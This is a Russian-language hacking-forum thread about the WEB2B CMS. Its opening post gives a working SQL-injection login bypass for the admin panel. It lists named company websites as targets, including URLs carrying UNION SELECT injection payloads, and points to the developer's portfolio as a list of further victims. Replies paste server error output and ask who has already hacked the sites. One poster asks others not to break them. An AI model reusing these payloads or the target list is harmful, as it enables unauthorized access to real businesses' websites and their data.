Вообщем так.
http://web2b.ru - офф. сайт конторы, разрабатывающей сайты и авторы своего двига WEB2B CMS...

Вообщем входим в админку практически всех сайтов этого двига:

/admin/
login:asd' or 1=1/*
password: asdasd

На некоторых правда в админке "сидит" .htacces =\
Но даже если так, то по-крайней мере на многих их сайтах есть sql-inj =\
Вот примеры "таких" сайтов:

http://www.rustransavto.ru/admin
http://www.blockmarine.ru/admin
http://www.sundesignlux.ru/admin
http://www.kupi-cupe.ru/admin
http://www.imid.ru/news/?lang=rus&id=-99'+union+select+1,2,3,4,5,6,7/*
http://www.promastanok.ru/mod/catalog/detail.php?id=-99'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15/*

Портфолио ака все сайты конторы:
http://web2b.ru/works.htm

Warning: main(/usr/local/apache/htdocs/config.php): failed to open stream: No such file or directory in /home/www/htdocs/admin/index.php on line 3

Warning: main(): Failed opening '/usr/local/apache/htdocs/config.php' for inclusion (include_path='') in /home/www/htdocs/admin/index.php on line 3

Fatal error: Cannot instantiate non-existent class: admininterface in /home/www/htdocs/admin/index.php on line 4
Кто уже похекал?
А такие бабки ломят за свою ху*ню, извиняюсь...
Вобщем-то это и на CMS не тянет... функциональность на нуле.

Warning: main(/usr/local/apache/htdocs/config.php): failed to open stream: No such file or directory in /home/www/htdocs/admin/index.php on line 3

Warning: main(): Failed opening '/usr/local/apache/htdocs/config.php' for inclusion (include_path='') in /home/www/htdocs/admin/index.php on line 3

Fatal error: Cannot instantiate non-existent class: admininterface in /home/www/htdocs/admin/index.php on line 4
Кто уже похекал?
А такие бабки ломят за свою ху*ню, извиняюсь...
гы, ты 4ё сразу на офф. сайт то сам полез ? :D

Ребят, зря выложили, БОЛЬШАЯ ПРОСЬБА "НЕ ЛОМАЙТЕ САЙТЫ" - серьезные компании ведь, реально не хорошо. =)

Ребят, зря выложили, БОЛЬШАЯ ПРОСЬБА "НЕ ЛОМАЙТЕ САЙТЫ" - серьезные компании ведь, реально не хорошо. =)
omg, а их кто-то ломает ? :D